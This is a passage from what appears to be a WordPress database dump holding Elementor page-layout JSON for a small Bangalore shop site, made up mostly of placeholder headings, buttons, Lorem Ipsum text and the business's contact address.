NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8093,1432,'_elementor_page_assets','a:0:{}'),(8095,1433,'_elementor_edit_mode','builder'),(8096,1433,'_elementor_template_type','wp-page'),(8097,1433,'_elementor_version','3.7.7'),(8098,1433,'_wp_page_template','elementor_canvas'),(8099,1433,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8100,1433,'_elementor_page_assets','a:0:{}'),(8103,1434,'_elementor_edit_mode','builder'),(8104,1434,'_elementor_template_type','wp-page'),(8105,1434,'_elementor_version','3.7.7'),(8106,1434,'_wp_page_template','elementor_canvas'),(8107,1434,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"